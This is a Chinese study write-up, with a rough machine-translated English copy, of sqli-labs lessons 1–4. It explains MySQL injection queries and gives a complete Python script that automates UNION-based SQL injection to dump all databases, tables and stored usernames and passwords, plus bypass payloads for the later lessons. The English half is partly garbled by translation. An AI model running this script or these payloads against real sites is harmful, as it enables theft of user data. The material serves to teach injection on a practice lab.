sqli-lab1~4(sqli-lab1~4)

基础知识

常用函数:

version()		Mysql版本
user() 		数据库用户名
database() 	数据库名
@@datadir 	数据库安装路径
@@version_compile_os 	操作系统版本

常用查询语句:

  • 查库
select schema_name from information_schema.schemata
  • 查表
select table_name from information_schema.tables where table_schema='security' 
-- 该表名用的时候大多转为*16*进制
  • 查列
select column_name from information_schema.columns where table_name='users'
  • 查字段
select username,password from security.users
  • 查询结果按第n列排序 (用于报错注入测试有几列)
order by (n)

sql注释符:

  • #

  • –+

字符串连接函数

  • concat (str1 , str2) — 连接字符串, 无分隔符

  • concat (-/~ , str1 , str2) — 连接字符串, 有分隔符

  • group_concat (str1 , str2) — 连接字符串, 并用 ‘,’ 分隔每一个字符

字符型 数字型 搜索型 注入的区别和判断

(如题)

study 1:

首先用id=1’发现报错, 再用id=1′ or ‘1’=’1发现成功注入, 判断为字符型注入

写了个脚本, 一把梭

# coding=utf-8

import requests
from urllib import parse
import sys
from bs4 import BeautifulSoup

url = "http://www.sqlstudy.com/sqlstudy/Less-1"

def CheckStatus(r_text):
    if "Login name" in r_text:
        return 1
    else:
        return 0

def PrintNameAndPswd(res_text):
    pos_name = res_text.index("Your Login name:")
    pos_name_move = pos_name
    pos_pswd = res_text.index("Your Password:", pos_name)
    pos_pswd_move = pos_pswd
    str_name = ''
    str_pswd = ''
    while res_text[pos_name_move] != '<':
        pos_name_move += 1
    str_name = res_text[pos_name : pos_name_move]
    while res_text[pos_pswd_move] != '<':
        pos_pswd_move += 1
    str_pswd = res_text[pos_pswd : pos_pswd_move]
    # print (str_name + '\n' + str_pswd)
    return str_name


def GetColumnsNum():
    left = 1
    right = 20
    mid = (left + right) // 2
    while left <= right:
        payload = "id=1' order by {}--+".format(mid)
        res = requests.get(url = url , params = payload)
        # print(parse.unquote(res.url))
        res_text = res.text
        if CheckStatus(res_text):
            # PrintNameAndPswd(res_text , pos_name , pos_pswd)
            left = mid + 1
        else:
            right = mid - 1
        mid = (right + left) // 2

    return mid

def HowItContrl(columnsnum):
    # Your Login name:2
    # Your Password:3
    payload = "id=-1' union select "
    for i in range(1 , columnsnum + 1):
        payload = payload + "{},".format(i)
    res = requests.get(url=url , params=payload.strip(",") + '--+')
    res_text = res.text
    if CheckStatus(res_text):
        PrintNameAndPswd(res_text)

def GetAllDatabase():
    payload = "id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+"
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        return PrintNameAndPswd(res_text)

def WhereAmI():
    payload = "id=-1' union select 1,database(),3 --+"
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        MyPosition = PrintNameAndPswd(res_text)
        return MyPosition[MyPosition.index(":") + 1 : ]

def GetTableName(DatabaseName):
    payload = "id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=\"{}\"--+".format(DatabaseName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        TableName = PrintNameAndPswd(res_text)
        TableName = TableName[TableName.index(":") + 1 :].split(",")
        return TableName

def GetColumnName(TableName):
    payload = "id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='{}' --+".format(TableName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        ColumnName = PrintNameAndPswd(res_text)
        ColumnName = ColumnName[ColumnName.index(":") + 1 :].split(",")
        return ColumnName

def GetDetails(DatabaseName , TableName , ColumnName):
    payload = "id=-1' union select 1,group_concat({}),3 from {}.{} --+".format(ColumnName , DatabaseName , TableName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        Details = PrintNameAndPswd(res_text)
        Details = Details[Details.index(":") + 1 :].split(",")
        return Details

if __name__ == "__main__" :
    with open('sqli-lab1.txt' , 'w') as f:
        columnsnum = GetColumnsNum()
        f.write("column_number = " + str(columnsnum) + '\n')
        # HowItContrl(columnsnum)
        DatabaseName = GetAllDatabase()
        DatabaseName = DatabaseName[DatabaseName.index(":") + 1:].split(",")
        MyPosition = WhereAmI()
        f.write("You are in : " + MyPosition + '\n')
        for i in range(0,len(DatabaseName)):
            f.write("DatabaseName : " + DatabaseName[i] + '\n')
            TableName = []
            TableName = GetTableName(DatabaseName[i])
            # print(TableName)
            for j in range(0,len(TableName)):
                f.write("--TableName : " + TableName[j] + '\n')
                ColumnName = []
                ColumnName = GetColumnName(TableName[j])
                # print(ColumnName)
                for k in range(0, len(ColumnName)):
                    f.write("----ColumnName : " + ColumnName[k] + '\n')
                    Details = []
                    Details = GetDetails(DatabaseName[i] , TableName[j] , ColumnName[k])
                    # print(type(Details))
                    Details_type = str(type(Details))
                    if not "NoneType" in Details_type:
                        for l in range(0,len(Details)):
                            f.write("------Details : " + Details[l] + '\n')
                            if l == len(Details) - 1:
                                f.write("\n---------------------------------------------------------------\n\n")
                    else:
                        f.write("--------Details : NULL \n")

study 2:

发现是数字型, 用id=-1 or 1=1–+就能绕过, 然后脚本改改也能一把梭

study 3:

使用id=1’之后发现报错, 结合错误语句看出是(‘id’), 用id=-1′) or 1=1–+就能绕过, 然后改脚本一把梭

study 4:

id=1’没报错, 换成id=1″报错, 结合语句判断出是(“id”), 用id=-1″) or 1=1–+即可绕过, 改脚本梭哈

————————

Basic knowledge

Common functions:

version()		Mysql版本
user() 		数据库用户名
database() 	数据库名
@@datadir 	数据库安装路径
@@version_compile_os 	操作系统版本

Common query statements:

  • inspection of the treasury
select schema_name from information_schema.schemata
  • Look up table
select table_name from information_schema.tables where table_schema='security' 
-- 该表名用的时候大多转为*16*进制
  • List
select column_name from information_schema.columns where table_name='users'
  • Query field
select username,password from security.users
  • The query results are sorted by column n (there are several columns for error injection test)
order by (n)

SQL comment:

  • #
  • –+

String concatenation function

  • Concat (STR1, STR2) — connection string, no separator
  • Concat (- / ~, STR1, STR2) — connection string with separator
  • group_ Concat (STR1, STR2) — connect strings and separate each character with ‘,’

Difference and judgment of character type, number type and search type injection

(as title)

study 1:

First, find the error with id = 1 ‘, and then find the successful injection with id = 1’ or ‘1’ =. It is judged as < strong > character injection < / strong >

Wrote a script, a shuttle

# coding=utf-8

import requests
from urllib import parse
import sys
from bs4 import BeautifulSoup

url = "http://www.sqlstudy.com/sqlstudy/Less-1"

def CheckStatus(r_text):
    if "Login name" in r_text:
        return 1
    else:
        return 0

def PrintNameAndPswd(res_text):
    pos_name = res_text.index("Your Login name:")
    pos_name_move = pos_name
    pos_pswd = res_text.index("Your Password:", pos_name)
    pos_pswd_move = pos_pswd
    str_name = ''
    str_pswd = ''
    while res_text[pos_name_move] != '<':
        pos_name_move += 1
    str_name = res_text[pos_name : pos_name_move]
    while res_text[pos_pswd_move] != '<':
        pos_pswd_move += 1
    str_pswd = res_text[pos_pswd : pos_pswd_move]
    # print (str_name + '\n' + str_pswd)
    return str_name


def GetColumnsNum():
    left = 1
    right = 20
    mid = (left + right) // 2
    while left <= right:
        payload = "id=1' order by {}--+".format(mid)
        res = requests.get(url = url , params = payload)
        # print(parse.unquote(res.url))
        res_text = res.text
        if CheckStatus(res_text):
            # PrintNameAndPswd(res_text , pos_name , pos_pswd)
            left = mid + 1
        else:
            right = mid - 1
        mid = (right + left) // 2

    return mid

def HowItContrl(columnsnum):
    # Your Login name:2
    # Your Password:3
    payload = "id=-1' union select "
    for i in range(1 , columnsnum + 1):
        payload = payload + "{},".format(i)
    res = requests.get(url=url , params=payload.strip(",") + '--+')
    res_text = res.text
    if CheckStatus(res_text):
        PrintNameAndPswd(res_text)

def GetAllDatabase():
    payload = "id=-1' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+"
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        return PrintNameAndPswd(res_text)

def WhereAmI():
    payload = "id=-1' union select 1,database(),3 --+"
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        MyPosition = PrintNameAndPswd(res_text)
        return MyPosition[MyPosition.index(":") + 1 : ]

def GetTableName(DatabaseName):
    payload = "id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=\"{}\"--+".format(DatabaseName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        TableName = PrintNameAndPswd(res_text)
        TableName = TableName[TableName.index(":") + 1 :].split(",")
        return TableName

def GetColumnName(TableName):
    payload = "id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='{}' --+".format(TableName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        ColumnName = PrintNameAndPswd(res_text)
        ColumnName = ColumnName[ColumnName.index(":") + 1 :].split(",")
        return ColumnName

def GetDetails(DatabaseName , TableName , ColumnName):
    payload = "id=-1' union select 1,group_concat({}),3 from {}.{} --+".format(ColumnName , DatabaseName , TableName)
    res = requests.get(url=url, params=payload)
    # print(parse.unquote(res.url))
    res_text = res.text
    if (CheckStatus(res_text)):
        Details = PrintNameAndPswd(res_text)
        Details = Details[Details.index(":") + 1 :].split(",")
        return Details

if __name__ == "__main__" :
    with open('sqli-lab1.txt' , 'w') as f:
        columnsnum = GetColumnsNum()
        f.write("column_number = " + str(columnsnum) + '\n')
        # HowItContrl(columnsnum)
        DatabaseName = GetAllDatabase()
        DatabaseName = DatabaseName[DatabaseName.index(":") + 1:].split(",")
        MyPosition = WhereAmI()
        f.write("You are in : " + MyPosition + '\n')
        for i in range(0,len(DatabaseName)):
            f.write("DatabaseName : " + DatabaseName[i] + '\n')
            TableName = []
            TableName = GetTableName(DatabaseName[i])
            # print(TableName)
            for j in range(0,len(TableName)):
                f.write("--TableName : " + TableName[j] + '\n')
                ColumnName = []
                ColumnName = GetColumnName(TableName[j])
                # print(ColumnName)
                for k in range(0, len(ColumnName)):
                    f.write("----ColumnName : " + ColumnName[k] + '\n')
                    Details = []
                    Details = GetDetails(DatabaseName[i] , TableName[j] , ColumnName[k])
                    # print(type(Details))
                    Details_type = str(type(Details))
                    if not "NoneType" in Details_type:
                        for l in range(0,len(Details)):
                            f.write("------Details : " + Details[l] + '\n')
                            if l == len(Details) - 1:
                                f.write("\n---------------------------------------------------------------\n\n")
                    else:
                        f.write("--------Details : NULL \n")

study 2:

It is found that it is digital. You can bypass it with id = – 1 or 1 = 1 — +, and then you can change the script

study 3:

After using id = 1 ‘, an error is found. Combined with the Error statement, it can be seen that it is (‘id’). Use id = – 1 ‘) or 1 = 1 — + to bypass it, and then change the script

study 4:

If id = 1 ‘does not report an error, replace it with id = 1 “to report an error. Judge whether it is (” Id “) in combination with the statement. Use id = – 1”) or 1 = 1 — + to bypass and change the script